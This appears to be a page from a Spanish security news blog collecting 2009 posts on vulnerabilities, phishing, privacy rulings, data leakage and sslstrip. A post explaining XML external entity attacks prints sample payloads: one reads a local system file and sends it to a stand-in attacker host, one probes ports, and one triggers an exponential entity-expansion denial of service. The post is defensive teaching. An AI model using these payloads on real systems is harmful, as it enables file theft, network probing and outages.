Se ve que estas prácticas están más generalizadas de lo que uno puede pensar, aunque si tenemos en cuenta que únicamente el 31% de los encuestados admiten que sus empleadores actuaron con integridad y equidad, mientras que el 44% opinan justamente lo contrario y otro 25% no lo tienen claro, tal vez sea una especie de vuelto por parte de los trabajadores al maltrato de los empleadores

La mayor parte de la información que los participantes se han llevado han sido correos electrónicos y documentos almacenados en los discos duros a los que tenían acceso. Aunque algunos no se contentaron con ello y decidieron hacerse copias de bases de datos y hasta del código fuente de los programas que se estaban implementando en el momento en que fueron despedidos.

Fuente: Abadia Digital

Seguir leyendo...

Adobe publica actualización de su reproductor Flash, la 10.0.22.87

Adobe ha publicado una nueva versión de su reproductor Flash, la 10.0.22.87, que soluciona un problema de seguridad tanto en Adobe Flash Player 10.0.12.36 -la que hasta ahora era la última versión- como en versiones anteriores de este popular complemento.

Según el documento publicado por Adobe, dicha vulnerabilidad podía hacer que un atacante que la explotase convenientemente pudiera ganar acceso al sistema y controlarlo remotamente. El ataque podría consistir en un fichero SWF malicioso que al cargarse en el reproductor daría acceso a los recursos de la víctima al atacante.

Para solucionar el problema Adobe ha publicado la versión 10.0.22.87 de su Flash Player, que ya está disponible a través del Player Downloader Center, y que también podremos descargar desde las opciones de actualización del programa. De hecho es muy probable que la próxima vez que utilicéis el reproductor salte la alerta de actualización, que os recomendamos aceptar para tener el reproductor al día… y seguro.

Fuente: The Inquirer

Seguir leyendo...

Post 6000: post inútil

Para festejar los 6000 posts en este Blog es justo, cada tanto, colocar algo inútil, o al menos algo por lo cual no perdería el sueño: la tabla periódica de las redes sociales.

¡Felicitaciones por haber llegado hasta aquí!

Cristian de la Redacción de Segu-Info

Seguir leyendo...

Actualizado: Mitigando la vulnerabilidad de Adobe Reader

Actualización 25-febrero 23:00hs

Desactivar JavaScript NO es una forma efectiva de eliminar el riesgo y ya hay pruebas de concepto que lo confirman como describe Carsten Eiram en el blog de Secunia.
A continuación nuestra nota corregido y actualizado con las opciones válidas para mitigar el riesgo.

Como se sabe desde la semana pasada Adobe se tomará un tiempo para publicar la solución a la vulnerabilidad que afecta al Adobe Reader y que ya está siendo explotada activamente.

Mientras tanto hay algunas medidas que pueden tomarse para mitigar esta amenaza:

• Symantec recomienda mantener actualizado el antivirus y dice que por ahora se trata de un ataque dirigido a personas de alto rango en distintas empresas.
• En el blog de Sunbelt, Alex Eckelberry menciona que si uno usa Snort puede aplicar una regla especialmente diseñada para esto y que soluciona la llegada de archivos PDF con compresión JBIG2 que dicen los investigadores de vulnerabilidades de SourceFire es el lugar donde se produce la explotación de los PDF.
• Otros como Darknet recuerdan la posibilidad de usar otro lector de archivos PDF como el Foxit! PDF Reader que no es vulnerable a esta falla ni otras que sucedieron a Adobe Reader.
• Parche no oficial para vulnerabilidad de Adobe Reader

Raúl de la Redaccion de Segu-Info en base a las fuentes mencionadas.

Seguir leyendo...

Presentaciones de Black Hat DC 2009 disponibles

Se acaban de publicar las presentaciones y algunos videos sobre Black Hat DC 2009 llevada a cabo en Washington DC el pasado 17 y 18 de febrero.

Las presentaciones son las siguientes:

• Ryan C. Barnett
  WAF Virtual Patching Challenge: Securing WebGoat with ModSecurity
• Cesar Cerrudo
  SQL Server Anti-Forensics
• Matthew Flick
  XSS Anonymous Browser
• Xinwen Fu
  One Cell is Enough to Break Tor's Anonymity
• Travis Goodspeed
  Reversing and Exploiting Wireless Sensors
• Vincenzo Iozzo
  Let Your Mach-O Fly
  Prajakta Jagdale
• Blinded by Flash: Widespread Security Risks Flash Developers Don't See
• Dan Kaminsky
  DNS 2008 and the New (old) Nature of Critical Infrastructure
• William Kimball
  Emulation-based Software Protection Providing Encrypted Code Execution and Page Granularity Code Signing
• Paul Kurtz
  Keynote: The Move from Strategic Indecision to Leadership in Cyberspace
• Brian Krumheuer, Jason Raber
  QuietRIATT: Rebuilding the Import Address Table Using Hooked DLL Calls
• Adam Laurie
  Satellite Hacking for Fun and Profit
• Andrew Lindell
  Making Privacy-Preserving Data Mining Practical with Smartcards
• David Litchfield
  The Forensic Investigation of a Compromised Oracle Database Server
• Moxie Marlinspike
  New Techniques for Defeating SSL/TLS
• Michael Muckin
  Windows Vista Security Internals
• Duc Nguyen
  Your Face Is NOT Your Password
• Peter Silberman
  Snort My Memory
• Val Smith, Colin Ames
  Dissecting Web Attacks
• Michael Sutton
  A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage
• Rafal Wojtczuk & Joanna Rutkowska
  Attacking Intel® Trusted Execution Technology
• Paul Wouters
  Defending Your DNS in a Post-Kaminsky World
• Stefano Zanero
  Alternate: Masibty: A Web Application Firewall Based on Anomaly Detection
• Earl Zmijewski
  Defending Against BGP Man-In-The-Middle Attacks

Cristian de la Redacción de Segu-Info

Seguir leyendo...

La Corte puso límites a las escuchas teléfonicas por parte del Estado argentino

El máximo tribunal de Justicia declaró inconstitucional una ley que obligaba a las empresas de telecomunicaciones a registrar durante 10 años los diálogos; a ellos podía acceder la SIDE; el fallo también consagra la acción colectiva, que permite extender los alcances de una sentencia a un grupo de personas que se vean afectadas por idéntica situación.

La Corte Suprema de Justicia declaró hoy la inconstitucionalidad de una ley que autorizaba la intervención de las comunicaciones telefónicas y por Internet, con la obligación de las empresas de preservar durante 10 años la información sobre las comunicaciones de los usuarios.

El fallo, dictado por la mayoría de los miembros del tribunal, confirmó sentencias de primera y segunda instancia del fuero en lo Contencioso Administrativo que habían declarado inconstitucional la ley 25.873 y su decreto reglamentario.

Los magistrados entendieron que las comunicaciones a las que se refiere dicha ley integran la esfera de la intimidad personal y se encuentran alcanzadas por los artículos 18 y 19 de la Constitución Nacional.

"Es evidente que lo que las normas cuestionadas han establecido no es otra cosa que una restricción que afecta una de las facetas del ámbito de la autonomía individual que constituye el derecho a la intimidad, por cuanto sus previsiones no distinguen ni precisan de modo suficiente las oportunidades ni las situaciones en las que operarán las interceptaciones, toda vez que no especifican el tratamiento del tráfico de información de Internet en cuyo contexto es indiscutible que los datos de navegación anudan a los contenidos", expresaron los magistrados.

Asimismo, señalaron que las normas tampoco prevén un sistema específico para la protección de las comunicaciones en relación con la acumulación y tratamiento automatizado de los datos personales.

Intervención de la SIDE. La ley declarada inconstitucional establecía que los prestadores de telecomunicaciones debían "disponer de los recursos humanos y tecnológicos necesarios para la captación y derivación de las comunicaciones", a su propio costo y para que el servicio estuviera "disponible en todo momento".

Además, avanzaba sobre la privacidad de las personas, pues establecía que debían registrarse y sistematizarse "los datos filiatorios y domiciliarios de sus usuarios y clientes, y los registros de tráfico de comunicaciones para su consulta por parte del Poder Judicial o del Ministerio Público", por el término de diez años.

La encargada de realizar esta tarea es la Dirección de Observaciones Judiciales, que depende de la Secretaría de Inteligencia, por lo que el Gobierno podía acceder a dicha información.

En ese sentido, la Corte consideró que "resulta inadmisible que las restricciones autorizadas por la ley estén desprovistas del imprescindible grado de determinación que excluya la posibilidad de que su ejecución concreta por agentes de la Administración quede en manos de la más libre discreción de estos últimos". En ese sentido, advirtió que "desde 1992 es la Dirección de Observaciones Judiciales de la SIDE, que actúa bajo la órbita del poder político, la que debe cumplir con los requerimientos que formule el Poder Judicial en orden a la interceptación de comunicaciones telefónicas u otros medios de transmisión que se efectúen por esos circuitos".

Acción colectiva. Por otra parte, el fallo creó además un criterio que permite extender los alcances de una sentencia a un grupo de personas que se vean afectadas por idéntica situación.

"Hay casos en que por una sola causa se afectan los derechos de numerosas personas, y en los que resulta muy difícil para cada uno de los afectados promover una acción judicial. En esos supuestos, resulta afectado el acceso a la Justicia", señaló el máximo tribunal.

En este caso, añadieron los jueces, "todos los usuarios de telefonía deberían iniciar un juicio individual para el caso en que consideren violados sus derechos", por lo que resolvieron ahorrar ese fárrago de expedientes potenciales y resolvieron darle "efectos generales a la sentencia", pues así "se evita la multiplicidad de juicios".

El expediente. La causa había sido iniciada por el abogado Ernesto Halabi , que promovió una acción de amparo contra la ley 25.873, que modificó la ley de telecomunicaciones número 19.798.

El Estado siempre se amparó en la necesidad de combatir la delincuencia. Un juez federal de primera instancia declaró la inconstitucionalidad de la ley 25.873 y del decreto 1563/04.

La Cámara de Apelaciones, cuando confirmó el fallo, consideró que la cuestión no se había vuelto abstracta, pues si bien el decreto cuestionado había sido suspendido por otro de 2005, nunca fue derogado. El tribunal de apelaciones también señaló que el Estado esgrimió argumentos muy débiles para mantener la validez de normas tan controvertidas, las que, por cierto, también fueron dictadas en otras latitudes bajo la excusa de protegerse frente al terrorismo.

Frente a este fallo adverso, el Estado nacional dedujo recurso extraordinario y en virtud del mismo el caso llegó a la Corte Suprema.

Fuente: La Nación

Seguir leyendo...

OneSwarm, un P2P todo cifrado

Como era de esperarse la incansable manía de muchas de las empresas del entretenimiento en pos de limitar el intercambio de archivos de lo que ellos se consideran dueños esta haciendo que algunos prefieran avanzar un poco y sacarles la posibilidad de espiarnos, usando a nuestro proveedor de Internet, mirando que es lo que estamos compartiendo en la red p2p. Esta, además, es una de las principales formas que usan para crear sus ridículas demandas.

Por esto sale el (acá para bajarlo) que es un cliente basado en BitTorrent, creado por la gente de la Universidad de Washington y es de código libre. El mismo agrega seguridad en encriptación de datos, oculta el origen de los mismos y el destino. Es, justamente, un golpe a la principal fuente de información de inquisidores de la música y el video.

Un paso obvio que muestra nuevamente la gran adaptabilidad que tiene Internet a las trabas que el quieran poner.

Fuente: Tecnogeek

Seguir leyendo...

Ataques contra parsers XML

XML se ha convertido en un estándar para el intercambio de información y es la base de tecnologías emergentes como Ajax/Web 2.0 y Web services.

XML permite el uso de entidades, estos elementos básicamente sirven para referenciar su contenido dentro del propio documento. Un uso típico de una entidad es cuando definimos una abreviatura de un nombre largo para posteriormente utilizar su versión corta dentro del documento, por ejemplo:

< !ENTITY s21 "Grupo S21sec Gestión ">

Menos conocida es la posibilidad de insertar contenido de elementos externos, por ejemplo:

< !ENTITY midoc SYSTEM "http://www.s21sec.com /midoc.xml">
< !ENTITY arch SYSTEM "arch.txt">

El problema aparece cuando el parser que trata los datos de entrada XML procesa sin ninguna restricción elementos como los anteriores descritos. Es entonces cuando podemos utilizar esta técnica, que comúnmente recibe el nombre de “Ataques XXE (XML eXternal Entity)”, para atacar al servidor que procesa el documento XML.

Lectura de ficheros arbitrarios: Se trata sencillamente de definir una entidad que expanda el contenido de un fichero local del servidor. Aún así, notar que el parser XML espera un documento con cierto formato y existen restricciones en los tipos de ficheros aceptados por el parser a no ser que se indique explícitamente que no tienen formato. Ejemplo:

< !DOCTYPE doc [        < !ENTITY bootini SYSTEM "file:///C:/boot.ini ">
< !ENTITY enviarb SYSTEM "http://evil.org/?&bootini;">
]>

Escaneo de puertos: Se trata de definir entidades externas que el servidor deba resolver para insertar su contenido en el documento.

< !DOCTYPE scan [ < !ENTITY s21sec SYSTEM "http://1.1.1.1:21/">
]>

Existe un documento excelente detallando esta técnica de Colin Wong de SIFT.

Ataques de denegación de servicio: Otro ataque que nos permiten las entidades externas es hacer referencia a una entidad cuyo contenido implique un procesamiento exponencial por parte del parser XML. Por ejemplo, un parser vulnerable requerirá
grandes cantidades de memoria para expandir la siguiente entidad:

< !DOCTYPE SOAP-ENV:Envelope [       < !ENTITY x0 "s21sec">
< !ENTITY x1 "&x0&x0">
< !ENTITY x2 "&x1&x1">
...
< !ENTITY x100 "&x99&x99">]>

Para prevenir todos estos ataques hemos de indicar al parser XML que no procese entidades externas, la implementación de esta restricción dependerá en gran medida del parser que utilicemos.

Javier Méndez Navarro
S21sec Auditoría

Fuente: S21Sec

Seguir leyendo...

Chat de Gmail (Gtalk) invadido por engaño de phishing

[Supuestos] "amigos" del chat envían vínculos a URLs que infectan otras máquinas

El servicio de correo electrónico de Google ha sido invadido por un engaño de phishing que usa la mensajería instantánea (Google Talk) para confundir a los usuarios desprevenidos para entregar sus contraseñas:
Una vez que los usuarios de chat de Gmail (Gtalk) son atacados, los phishers toman control de las cuentas de chat y envían mensajes a otros usuarios supuestamente con un enlace a un "video gracioso." Cuando los usuarios hacen clic en el enlace, son dirigidos a un sitio Web llamado "ViddyHo," donde se les pide ingresar su nombre de usuario de Gmail y la contraseña. El sitio Web roba así la información de la cuenta del usuario y usan sus cuentas de chat para enviar más mensajes.

El Blogger Nathan Burke buscó la información de ese nombre de dominio viddyho.com y descubrió que el sitio Web existe solo desde la semana pasada. También observó que viddyho.com está dirigido a varios protocolos distintos de chat más allá de Gmail, incluyendo AOL Instant Messenger, ICQ, Yahoo! Messenger, MSN Messenger y MySpace.

El engaño de phishing de Gmail apareció por primera vez unas horas después que el servicio Gmail de Google experimentara un "apagón" significativo esta mañana. Hasta el momento no se conoce su el apagón está conectado con este engaño de phishing.

Nota de Segu-info:
* Si ud. sospecha que pudo haber sido engañado de esta forma cambie inmediatamente la contraseña de Gmail.
* Recuerde, si se encuentra con un sitio Web que le solicita sus credenciales, piense dos veces antes de ingresarlas.

Traducido para blog de Segu-Info por Raúl Batista

Autor: Brad Reed
Fuente: NetworkWorld

Seguir leyendo...

La Corte Suprema confirma la inconstitucionalidad de la ley de datos de tráfico

La Corte Suprema de Justicia de la Nación acaba de confirmar el fallo que declaró inconstitucional la ley de datos de tráfico, ley 25.873, en el caso Halabi por lo que la ley y su decreto reglamentario no resultan aplicables hasta tanto el Congreso aprueba una nueva ley.

Es importante que ahora el Congreso intente aprobar una ley mas completa como la sancionada en España recientemente llamada Ley 25/2007 de 18 de octubre sobre conservación de datos relativos a las comunicaciones electrónicas y a las redes públicas de comunicaciones o en las normas respectivas de la Convención del Cibercrimen, de modo de poder permitir obtener pruebas relacionadas con los delitos informáticos y que ésto se realice en colaboración con las telefónicas y los isps. De lo contrario, Internet será el vale todo y será imposible obtener pruebas digitales.

Contenido completo en Habeas Data

Seguir leyendo...

Detectan varios bugs en algunos de los candidatos a SHA-3

Como es sabido, el NIST tiene en marcha un concurso para seleccionar el algoritmo que se utilizará para SHA-3.

Pues bien; una primera aproximación con la herramienta de análisis de código de Fortify ya ha detectado varios bugs en algunos de los algoritmos candidatos.

Entre los más destacables, varios desbordamientos de buffer en el MD6 de Ron Rivest y su equipo.

Fuente: Kriptopolis

Seguir leyendo...

La seguridad informática en tiempos de crisis

RSA ha dado a conocer los resultados de su tercer informe, “Driving Fast and Forward: Managing Information Security for Strategic Advantage in a Tough Economy". En este estudio, realizado junto con el Security for Business Innovation Council, examinan los retos originados por la actual crisis económica y ofrecen estrategias concretas para conseguir mayores objetivos con menos recursos en este año 2009.

“En una situación económica adversa, es tentador para las compañías frenar la innovación empresarial" afirma Art Coviello, Presidente de RSA. “Sin embargo, las iniciativas estratégicas que permiten el aumento de los ingresos y la transformación operativa son más importantes que nunca. Los profesionales de la seguridad pueden ayudar a los líderes empresariales a localizar de forma segura las oportunidades de negocio más rentables, mediante el conocimiento de la situación de riesgo e identificando los compromisos correctos".

Mientras la economía está en recesión, las demandas en programas de seguridad son crecientes. Las presiones presupuestarias y de contratación unido al aumento de las necesidades reguladoras, las crecientes amenazas y las altas expectativas de los líderes empresariales continúan contribuyendo a que la compañía invierta en seguridad. En este entorno, los equipos de seguridad de la información deben tomar decisiones, no siempre fáciles, sobre dónde invertir tiempo, dinero y esfuerzo.

El estudio, denominado “Driving Fast and Forward: Managing Information Security for Strategic Advantage in a Tough Economy" ofrece cinco recomendaciones para gestionar con éxito programas de seguridad en las empresas en este año 2009:

• Priorizar en función de los riesgos / recompensas: Los miembros del Security for Business Innovation Council apelan a los profesionales de la seguridad a que afinen sus habilidades a la hora de hacer una estimación basada en el riesgo.
• Contar con la correcta combinación de profesionales en el equipo: En tiempos difíciles, todos los equipos de seguridad deberían tener a los profesionales adecuados. Deberían ser capaces de ofrecer soluciones y diálogos alternativos a los propietarios de las empresas, más allá de la seguridad.
• Construir procesos repetibles: En la mayor parte de las organizaciones, hay muchas oportunidades para racionalizar los sistemas y lograr economías de escala. Los miembros del Council recomiendan que los responsables de la seguridad de la información mejoren los rendimientos mediante la aplicación de tradicionales operaciones métricas a sus programas de seguridad.
• Crear una Estrategia de Reparto de Coste Óptima: A menudo los costes de seguridad son compartidos entre la organización central y varias unidades o departamentos de negocio que necesitan proteger sus activos de información. Los miembros del Council analizan en profundidad las estrategias para que las inversiones estén alineadas con las necesidades y objetivos.
• Automatizar y externalizar sabiamente: Utilizando la tecnología para automatizar procesos manuales y externalizando algunas funciones de seguridad, se pueden generar eficiencias significativas e importantes reducciones de costes, pero es importante planificar y gestionar estos esfuerzos con cuidado para maximizar así los beneficios.

Fuente: DiarioTi

Seguir leyendo...

Carta de intimación por descargas de archivos (II)

Luego de la publicación de la carta de intimación a usuarios para que desistan de descargar archivos desde las redes P2P, muchos usuarios se contactaron con nosotros para hacernos preguntas o brindarnos información (el debate en nuestro Foro).

Una persona que trabaja en un ISP argentino (nos pidió reserva de identidad) nos menciona que esas cartas se están enviando desde el año 2006 aproximadamente.

Nos cuenta que en algunas ocasiones debió notificar al cliente en forma telefónica y que luego se les envía una carta para para dar formalidad y deslindar responsabilidad de la empresa por futuras acciones legales que puedan tomar. El ISP prohíbe cualquier actividad que infrinjan propiedad intelectual, Copyright, etc. y en esto se basa la intimación.

Se supone que las empresas "afectadas" comparten archivos a través de la red Torrent, desde donde monitorean las direcciones IP que se conectan a sus máquinas para intercambiar archivos, obteniendo los datos necesarios. La empresa proveedora de servicios (el ISP) solo estaría mandando dicha carta para descargar su responsabilizad ante eventuales demandas.

A continuación uno de los correos electrónicos provenientes desde EE.UU., en donde se informa al ISP de la situación de violación de Copyright, en este caso de una película:
Como suponíamos al principio por ahora sólo se trata de "ajustar" a los proveedores argentinos para que los mismos se "encarguen" del tema con sus clientes. ¿Seguirá así?

Cristian de la Redacción de Segu-Info

Seguir leyendo...

Cómo pueden prevenir las empresas la fuga de datos confidenciales por e-mail

La realidad demuestra que las compañías pierden valiosa información por empleados infieles y falta de control. Abogados consultados por iProfesional.com recomiendan cómo supervisar esa herramienta de trabajo y qué medidas adoptar para proteger informes “sensibles”

El avance tecnológico de las comunicaciones y la voracidad por conocer cada vez más hacen que las empresas deban tomar mayores recaudos para proteger uno de sus principales activos: la confidencialidad de la información.

En este sentido, las patentes de invención, los derechos de autor, los secretos industriales y comerciales, y la cartera de clientes constituyen un “botín” bastante preciado, que en ocasiones es vulnerado desde las grandes estructuras de la compañía en forma intencional, por ejemplo, mediante el envío de datos a terceros efectuado por un empleado “infiel” o recientemente despedido.

Dentro de este escenario cobra especial relevancia el uso del e-mail laboral y cómo pueden las compañías supervisar que esta herramienta de trabajo sea correctamente utilizada por sus empleados y no se transforme en una vía para filtrar información.

“Más allá de las múltiples ventajas que acarrea el uso del correo electrónico como medio de comunicación interna y externa, es preciso tener en cuenta que también constituye una ventana por la cual las empresas pueden perder información confidencial valiosa, con la consecuente pérdida de ventaja competitiva, clientes, ventas y mercado”, dijo Horacio Bruera, socio de Carranza Torres & Asociados.

El abogado agregó que “a diferencia de otras épocas, en que el robo de información confidencial suponía un tortuoso y riesgoso procedimiento, como el ingreso a lugares de acceso restringido o fotocopiados de documentos, hoy en día la distancia que separa el secreto de la divulgación pública es de un clic”.

Cómo evitar la fuga de información
Todo este contexto torna necesario indagar respecto de cuáles son las medidas que puede adoptar el empleador para evitar el goteo de información por mail, pero sin perjudicar los derechos de los trabajadores.

Para Bruera las medidas de control deben ser “razonables, adecuadas para salvaguardar la confidencialidad de la información y no deben vulnerar los derechos del empleado”.

El profesional aconsejó tomar las siguientes medidas de control y prevención:

• Exigencia de una clave o password para acceder a los documentos que contienen información confidencial.
  
  
• Cambio periódico de esas claves.
  
  
• Fragmentación de la información de acuerdo a las necesidades de producción de cada área (por ejemplo, que ninguno de los empleados tenga acceso al código fuente completo).
  
  
• Inclusión de leyendas que dispongan que la información contenida en un documento es confidencial.
  
  
• Restricciones en cuanto al uso de Internet durante la jornada laboral.
  
  
• Remoción de discos de las PCs y su archivo en lugares cerrados.
  
  
• Celebrar acuerdos de confidencialidad.
  

Los reglamentos de la empresa
El abogado además afirmó que “los jueces han establecido una serie de condiciones que el empleador debe satisfacer a los efectos de ejercer válidamente el monitoreo, como, por ejemplo, regular el uso del e-mail en el reglamento de la empresa”.

En el mismo sentido se manifestó Adrián Faks, abogado asesor de empresas y titular del Estudio Faks Abogados: “Los reglamentos no sólo sirven para delimitar el uso de las herramientas informáticas (correo electrónico e Internet) sino también para precisar la utilización de todos los elementos suministrados por el empleador, ya sea el automóvil, herramientas de trabajo, una notebook, el uniforme”.

El especialista explicó que es sumamente importante que los reglamentos sean claros y entendibles por todo el personal de todas las categorías y dijo que por eso es habitual la introducción en algunos reglamentos de un apartado con “preguntas frecuentes” y su respectiva respuesta.

El deber de confidencialidad
Bruera explicó que la Ley de Contrato de Trabajo (LCT) establece que “el trabajador debe observar todos aquellos deberes de fidelidad que deriven de la índole de las tareas que tenga asignadas, guardando reserva o secreto de las informaciones a que tenga acceso y que exijan tal comportamiento de su parte”.

También explicó que la Ley de Confidencialidad de la Información (LCI) complementa aquella norma al señalar que cualquier persona que con motivo de su trabajo tenga acceso a una información, que reúna los requisitos señalados anteriormente y sobre cuya confidencialidad se la haya prevenido, deberá abstenerse de usarla y de revelarla sin causa justificada o sin consentimiento de la persona que guarda dichos datos o de su usuario autorizado.

Por eso, el abogado señaló que “la revelación no autorizada de información confidencial por parte de un empleado implica la violación de un deber fundamental dentro del contrato de trabajo, con las consecuencias previstas por la legislación laboral, pero también supone la violación de la Ley de Confidencialidad de la Información, que da lugar a medidas o acciones civiles y penales”.

El profesional dijo que tanto la LCT como la LCI “exigen al empleador que tiene bajo su legítimo control este tipo de información una acción concreta: prevenir al empleado acerca del carácter secreto de la información exigiéndole que mantenga la debida confidencialidad o reserva”.

¿Cuándo la información es confidencial?
Sin embargo y antes de tomar medidas de control, hay que preguntarse cuándo una información puede ser calificada como “confidencial”.

Bruera precisó que debe tratarse de un secreto, es decir, “que no sea información generalmente conocida ni fácilmente accesible en los círculos en que se suele utilizar. Esta exigencia deja fuera del alcance de la ley a la información que está en el dominio público y también a la que es generalmente conocida por los entendidos en determinada materia”.

Por ello, el abogado dijo que “la información deber ser objetivamente secreta, y esto quiere decir que no va a encuadrar como tal por el sólo hecho de que el empresario la califique de confidencial, sino porque no es conocida o fácilmente cognoscible por los competidores actuales o potenciales”.

Por último, Bruera concluyó que debe tratarse de "información valiosa para la empresa, que le otorga una ventaja competitiva en el mercado porque, por ejemplo, está en la base del desarrollo de un producto, le permite mejorar la ecuación costo-beneficio u organizar mejor el trabajo”.

Fuente: iProfesional.com

Seguir leyendo...

Parche no oficial para vulnerabilidad de Adobe Reader

Días después de conocerse una vulnerabilidad considerada como crítica en Adobe Acrobat y Reader, Sourcefire ha publicado un parche contra la vulnerabilidad. El parche sólo aplica a la versión de Windows de Adobe Reader 9.0 y no tiene ningún tipo de garantía.

El parche remplaza una librería DLL vulnerable, AcroRd32.dll, ubicada en “C:\Program Files\Adobe\Reader 9.0\Reader\” que pesa 19MB. Para versiones de Adobe Reader anteriores a la 9 tendrán que actualizar el software para poder utilizar este parche.

Los atacantes vienen aprovechando una vulnerabilidad en la llamada a una función no relacionada con JavaScript desde, por lo menos, el 12 de febrero (fecha en que se dió a conocer la vulnerabilidad) pero Adobe anunció que será hasta el 11 de marzo que se pueda parchear el fallo oficialmente.

Contrario a lo que informes anteriores han asegurado, la desactivación de JavaScript en Adobe Reader no impide la explotación de la vulnerabilidad.

Los usuarios que quieran probar este parche deben tener claro que la ejecución de software modificado por terceros conlleva mayor riesgo que la aplicación de un parche oficial.

Fuente: Blogantivirus

Seguir leyendo...

¿Cómo contactar con Google?

Relacionado con nuestro post sobre como configurar Google para cuidar la privacidad hoy, la misma empresa publica diversas formas de establecer contacto con ellos en todos servicios y herramientas que pone a disposición de los usuarios.

Cristian de la Redacción de Segu-Info

Seguir leyendo...

El SSL no está roto... ¿o sí?

Moxie Marlinspike protagonizó la semana pasada una conferencia en la Black Hat en la que demostraba cómo eludir la autenticación y el cifrado SSL de las páginas supuestamente seguras. El investigador se ha centrado en una inteligente combinación de técnicas que permiten confundir a los usuarios (incluso a los avanzados) sobre si están o no en la página correcta. Ninguna de las técnicas usadas es realmente nueva, pero todas en conjunto forman una excelente herramienta llamada sslstrip.

Sslstrip combina una buena tanda de técnicas con el único objetivo de que el usuario realmente no sepa que está en una web falsa o que su tráfico no está siendo realmente cifrado. Aclarar que el problema no está en el SSL, sigue siendo lo mejor de lo que disponemos para realizar conexiones seguras. El fallo está un poco en los navegadores, un mucho en los usuarios, algo en los certificados, bastante en las redes... pero no en la tecnología en sí.

Como siempre, teniendo en cuenta el éxito del que gozan técnicas mucho más sencillas, sslstrip todavía no será usado por atacantes de forma masiva, sino para ataques muy específicos contra usuarios avanzados. Y estos son quizás los que deban estar más atentos.

Para ser víctima del sslstrip, la primera condición ineludible es que la conexión debe estar siendo interceptada. Bien a través de un envenenamiento de ARP en red interna, bien a través de puntos de acceso wireless falsos... el caso es que el atacante debe actuar como proxy en la comunicación, teniendo acceso al tráfico. Esta es una premisa importante, pero no es extraña. El investigador usó con éxito la red de anonimato Tor para sus pruebas. Sslstrip hace todo en tiempo real, básicamente sustituyendo el tráfico cifrado (https) por uno no cifrado (http), de forma que al usuario se le presenta una página idéntica a la que necesita, pero sin cifrar y probablemente en otro servidor que pertenece al atacante. Acude al servidor real para tomar la información necesaria, pero en vez de devolverla cifrada al usuario, lo hace sin cifrar. Esta es su funcionalidad básica.

En la mayoría de las ocasiones esto sería suficiente para engañar a muchos usuarios. Pero obviamente esto llamaría la atención de otros tantos, que echarían en falta las advertencias que normalmente el navegador realiza cuando se está sobre una página cifrada (el candado, la barra dorada, el https, etc). Marlinspike, en su charla en la Black Hat, dio un buen montón de ideas y métodos para hacer que esto pase desapercibido incluso para los usuarios más avispados.

Una de ellas es la sustitución de un "favicon" de la página por un simple candado. El candado real no aparecería pero en los últimos tiempos se ha abusado tanto de esta imagen que su simple presencia (aunque no sea en el lugar correcto) da sensación de seguridad a los usuarios.

Otra de las técnicas es muy vieja ya. Se basa en el uso de caracteres especiales para hacer pensar al usuario que se encuentra en el dominio correcto. El atacante no tiene más que comprar un certificado válido para ese dominio, y de esta forma se evitarían todas las advertencias del navegador. Solo quien comprobase realmente la cadena de certificación del certificado estaría a salvo.

También presenta otras técnicas para eludir problemas como las cookies de seguridad y el manejo de sesiones autenticadas. Su herramienta tiene soluciones para evitar que el usuario más experimentado note que está siendo víctima de un robo de sus datos.

Otro de los puntos interesantes de la charla que ofreció Marlinspike, además de la presentación de la herramienta (que ha hecho pública), son las reflexiones sobre la seguridad SSL y cómo está implementada en los navegadores, de lo que hablaremos en la siguiente entrega.

Segundo revés del año al SSL. O más específicamente, a la confianza que tenemos los internautas en el SSL y las páginas seguras. La primera fue con los hashes de los certificados calculados con MD5, técnica dada a conocer a finales del año pasado. De nuevo se usaban diferentes métodos ya conocidos contra el SSL. Lo que Marlinspike ha publicado es una herramienta destinada a engañar al usuario que lo hace todo mucho más sencillo.

Marlinspike ya programó sslsniff en 2002, muy usado todavía, que realiza ataques man-in-the-middle sobre SSL. En su presentación en la Black Hat realiza una interesante reflexión sobre qué ha ocurrido con el cifrado SSL en los últimos años.

SSL no está roto por la publicación de sslstrip. Está "roto" desde hace tiempo, desde que el usuario medio al que intenta proteger no entiende en qué consiste esta tecnología, y desde que los navegadores han realizado una dudosa implementación del protocolo y en especial, de la interacción con el usuario.

Durante años, navegadores como Firefox 2.x e Internet Explorer 6.x, se han limitado a advertir al usuario con lo que Marlinspike llama "positive feedback", esto es, intentar demostrar que se está en el sitio correcto por medio de candados, barras doradas, etc. Esto no impresiona al usuario, que acaba obviando estos símbolos positivos. Pero lo peor es que es fácilmente imitable por los atacantes. Los diseñadores también han malacostumbrado a los internautas. En su empeño de parecer seguras, las páginas incluyen candados incluso en su propio código HTML, sellos de autenticidad y garantías... inútil a unos ojos que lo han visto mil veces y mucho más inútil cuando un atacante solo tiene que calcar el contenido de una web para engañar a un usuario.

Marlinspike concluye que el "negative feedback" para el usuario es mucho más efectivo. Esto es, advertirle con grandes pantallas (nada de ventanas emergentes, sino páginas integradas en el navegador) de que no se está en el sitio correcto. El usuario reacciona mejor ante las alertas negativas y catastróficas que ante la mera información o advertencia. Al no entenderlas por completo, terminarán por aceptar la opción que se le muestre por defecto.

En este sentido, tanto la rama 3 de Firefox como Internet Explorer 7 han mejorado sustancialmente. Acceder a una página con una cadena de validación de certificados inválida o con el certificado obsoleto, ahora requiere muchos más clicks por parte del usuario y es más escandalosamente advertido por los navegadores.

Sin embargo a pesar de todo eso sslstrip está preparado para hacer todo lo posible por convencer al usuario de que se encuentra en el sitio correcto. Y lo consigue. Ayuda el diseño de muchas páginas, que permiten que el usuario introduzca sus datos en un formulario no cifrado que termina en uno cifrado.

SSL por tanto, sigue siendo de las pocas cosas en las que podemos confiar en la red. El fallo está en todo lo que lo rodea: usuarios, diseñadores, protocolos, implementaciones, autoridades certificadoras... aprovechando pequeños problemas en todos y cada uno de estos actores, se pueden realizar ataques muy sofisticados. Si las técnicas quedan reunidas en una herramienta que permite llevarlas a cabo todas a la vez y sin demasiado esfuerzo, el problema es grave.

SSL goza de buena salud, pero si se comienza a cuestionar su validez, si siguen apareciendo técnicas que ponen en duda incluso a usuarios expertos, ya no importará si una página está cifrada o no. Para la mayoría de los usuarios, no significará nada porque realmente no tendrán forma de comprobar de forma sencilla que estén en el sitio correcto: "si pueden engañar a un usuario experto, también podrán conmigo de forma mucho más sencilla", y se rendirán ante una tecnología que ni conocen ni tienen por qué entender. Nadie quiere tener que comprobar rutas de certificación, fechas de certificados, etc, allá donde introduzca sus contraseñas.

Como solución, lo que Marlinspike propone es que todo el tráfico sea cifrado. No se debe pretender confiar ciegamente en HTTPs cuando está asentado sobre HTTP, un protocolo no seguro.

